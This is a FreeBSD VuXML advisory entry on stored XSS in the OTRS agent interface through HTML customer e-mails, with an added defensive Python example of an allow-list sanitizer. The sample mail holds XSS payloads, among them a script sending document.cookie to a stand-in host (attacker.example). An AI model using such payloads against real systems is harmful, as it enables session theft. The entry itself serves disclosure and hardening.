FreeBSD VuXML: Documenting security issues in FreeBSD and the FreeBSD Ports Collection

OTRS -- Multiple XSS and denial of service vulnerabilities

Affected packages
2.3.* < otrs < 2.4.9

Details

VuXML ID 96e776c7-e75c-11df-8f26-00151735203a
Discovery 2010-09-15
Entry 2010-11-03

OTRS Security Advisory reports:

AgentTicketZoom is vulnerable to XSS attacks from HTML e-mails:

Whenever a customer sends an HTML e-mail and RichText is enabled in OTRS, JavaScript contained in the e-mail can do everything in the OTRS agent interface that the agent himself could do.

Most relevant is that this type of exploit can be used in such a way that the agent won't even detect that he is being exploited.
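The advisory describes a stored XSS: HTML from a customer mail is rendered inside the agent's session, so script in it runs with the agent's privileges. The following Python is an added illustration written for this entry; it is not OTRS code and not the fix OTRS shipped. It contrasts the vulnerable pattern (the mail body dropped into the agent page as-is) with a generic allow-list sanitizer that strips scripts, event handlers and javascript: URLs. SAMPLE_MAIL is a constructed mail body, and the tag and attribute allow-lists are arbitrary choices for the example.

```python
"""Added example, not part of the OTRS advisory or OTRS itself.

render_unsafe(): models the vulnerable behaviour (HTML mail rendered verbatim).
render_safe():   a generic allow-list sanitizer, one possible hardening, not
                 the change OTRS made in 2.4.9.
SAMPLE_MAIL:     a constructed e-mail body with typical XSS vectors.
"""
import re
from html import escape
from html.parser import HTMLParser

# Allow-lists are illustrative; a real deployment would tune them.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li",
                "a", "span", "div"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style=, no on*= anywhere
ALLOWED_URL_SCHEMES = ("http:", "https:", "mailto:")
# Elements whose *content* must be dropped, not just the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object"}
VOID_TAGS = {"br"}

# Constructed sample: what a hostile customer might send.
SAMPLE_MAIL = (
    "<p>Hello support,</p>"
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    '<img src=x onerror="alert(document.cookie)">'
    '<a href="javascript:alert(1)">click</a>'
    '<a href="https://example.com/">ok link</a>'
    "<b>Thanks</b>"
)


class _Sanitizer(HTMLParser):
    """Rebuilds the document from an allow-list; everything else is dropped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0      # >0 while inside <script>, <style>, ...
        self.open_stack = []     # allowed tags we have emitted and not closed

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return               # unknown/disallowed tag: drop the tag only
        kept = []
        for name, value in attrs:
            if name.startswith("on"):
                continue         # event handlers are never allowed
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href":
                # Browsers ignore whitespace/control chars in the scheme
                # ("java\tscript:"), so strip them before checking it.
                probe = re.sub(r"[\x00-\x20]", "", value or "").lower()
                if not probe.startswith(ALLOWED_URL_SCHEMES):
                    continue     # javascript:, data:, relative URLs: dropped
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_stack.append(tag)

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag in VOID_TAGS or tag not in self.open_stack:
            return
        while self.open_stack:   # close back to the matching open tag
            t = self.open_stack.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    # Comments, doctype and processing instructions are silently dropped
    # by not overriding handle_comment/handle_decl/handle_pi.


def sanitize(html):
    p = _Sanitizer()
    p.feed(html)
    p.close()
    while p.open_stack:          # fail closed: balance anything left open
        p.out.append(f"</{p.open_stack.pop()}>")
    return "".join(p.out)


def render_unsafe(body):
    """Vulnerable pattern: customer HTML placed directly into the agent page."""
    return f'<div class="article-body">{body}</div>'


def render_safe(body):
    """Hardened pattern: only allow-listed markup reaches the agent page."""
    return f'<div class="article-body">{sanitize(body)}</div>'


if __name__ == "__main__":
    print("unsafe:", render_unsafe(SAMPLE_MAIL))
    print("safe:  ", render_safe(SAMPLE_MAIL))
```

The unsafe renderer reproduces the situation the advisory describes: the inline script, the onerror handler and the javascript: link all execute in the agent's browser with the agent's session. The sanitizer works by reconstruction rather than by blacklisting strings, which is why it also survives the whitespace-in-scheme trick and an unterminated `<script>`.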

References

CVE Name CVE-2010-2080
CVE Name CVE-2010-4071
URL http://otrs.org/advisory/OSA-2010-02-en/
URL http://otrs.org/advisory/OSA-2010-03-en/